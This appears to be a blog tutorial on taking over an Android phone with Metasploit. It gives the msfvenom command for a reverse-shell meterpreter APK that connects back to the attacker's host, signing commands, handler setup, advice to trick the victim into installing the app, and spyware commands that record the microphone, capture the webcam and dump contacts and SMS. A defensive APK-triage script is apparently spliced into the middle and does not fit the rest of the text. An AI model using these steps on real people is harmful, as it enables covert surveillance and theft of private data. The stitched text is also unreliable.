How to Hack an Android Phone Using Metasploit and MSFVenom


When it comes to hacking Android phones, there are tons of ways to do so. There are apps, web portals, scripts, and whatnot. We are going to guide you on how to hack an Android phone using Metasploit and MSFVenom.

PS: I have already written one article on hacking an Android phone with Spy Note; do read it.

So today we are going to learn about MSFVenom and how to hack an Android phone using Metasploit and MSFVenom. MSFVenom is a hacking tool used to hack Android devices by making malicious APKs. MSFVenom is made up of MSFPayload and MSFEncode. MSFEncode is the exploit tool, and MSFPayload is the command-line interface used to generate and output all the types of shellcode available in Metasploit.

To perform this hack you'll need Kali Linux installed on your computer and an Android phone as the target.

Below are the steps to perform this hack.

Step 1: Creating apk file

Open Kali Linux, open a terminal, and type in the following command:

# msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > hackingworld.apk


**LHOST= YOUR IP address

**LPORT= 4444

**Use ifconfig to find your IP address if you don't know it.

# ifconfig


Step 2: Delivering APK file to victim

You have now created your malicious spyware .apk file. It will be saved to your /home/ folder by default. Find your newly created hackingworld.apk and send it to your target. Use social engineering to do this so that the victim actually installs the APK.

**If you get any signing errors or issues use the following:

Keytool (Comes Pre-Installed in Kali Linux)

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

Jarsigner (Comes Pre-Installed in Kali Linux)

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore hackingworld.apk aliasname

jarsigner -verify -verbose -certs hackingworld.apk
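Seen from the receiving side, an APK signed the way the jarsigner command above signs it carries only a JAR (v1) signature with SHA-1 digests and has no APK Signing Block, which is a useful triage signal for a sideloaded file. The Python below is an added example, not part of the original article; the function names and the constructed sample archive (placeholder contents, no real code) are assumptions made for illustration.

```python
import io, re, struct, zipfile

V2_MAGIC = b"APK Sig Block 42"  # last 16 bytes of an APK Signing Block (scheme v2+)

def has_signing_block(data: bytes) -> bool:
    """True if an APK Signing Block sits directly before the ZIP central directory."""
    eocd = data.rfind(b"PK\x05\x06")  # End of Central Directory record
    if eocd < 0 or eocd + 20 > len(data):
        return False
    (cd_offset,) = struct.unpack_from("<I", data, eocd + 16)
    return cd_offset >= 16 and data[cd_offset - 16:cd_offset] == V2_MAGIC

def triage_apk(data: bytes) -> dict:
    """Report how an APK is signed, working only from its bytes."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        sf = [n for n in names if re.fullmatch(r"META-INF/[^/]+\.SF", n, re.I)]
        blocks = [n for n in names if re.fullmatch(r"META-INF/[^/]+\.(RSA|DSA|EC)", n, re.I)]
        digests = set()
        for n in sf:  # digest algorithm names used in the signature file(s)
            text = zf.read(n).decode("utf-8", "replace")
            digests.update(re.findall(r"^([A-Za-z0-9-]+?)-Digest", text, re.M))
    v1, v2 = bool(sf and blocks), has_signing_block(data)
    findings = []
    if not (v1 or v2):
        findings.append("unsigned")
    if v1 and not v2:
        findings.append("JAR (v1) signature only")
    if v1 and digests == {"SHA1"}:
        findings.append("SHA-1 digests only")
    return {"v1": v1, "v2": v2, "digests": sorted(digests), "findings": findings}

def constructed_sample() -> bytes:
    """Constructed stand-in for a jarsigner-signed APK (placeholder contents only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("classes.dex", b"placeholder")
        zf.writestr("META-INF/MANIFEST.MF",
                    "Manifest-Version: 1.0\r\n\r\nName: classes.dex\r\nSHA1-Digest: AAAA\r\n")
        zf.writestr("META-INF/ALIAS_NA.SF",
                    "Signature-Version: 1.0\r\nSHA1-Digest-Manifest: AAAA\r\n\r\n"
                    "Name: classes.dex\r\nSHA1-Digest: AAAA\r\n")
        zf.writestr("META-INF/ALIAS_NA.RSA", b"placeholder-pkcs7")
    return buf.getvalue()

if __name__ == "__main__":
    print(triage_apk(constructed_sample()))
```

The check reads signing metadata only; it does not verify the signature or inspect the app's code.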


Step 3: Metasploit setup

Open up a new terminal and use the following command to start the Metasploit framework.

# msfconsole


Now, in the Metasploit framework console, type the following:

msf  > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit

**LHOST= YOUR IP address

**LPORT= 4444

Now when the user opens up the app on his/her phone you will get a session with that device. And whoa! The device is yours to operate.

Step 4: Exploit..!!!

Some commands you should definitely try:

– record_mic
– webcam_snap
– webcam_stream
– dump_contacts
– dump_sms
– geolocate

So, this was all about hacking an Android Phone using MSFVenom. For feedback, questions or issues, feel free to write them in the comments section.
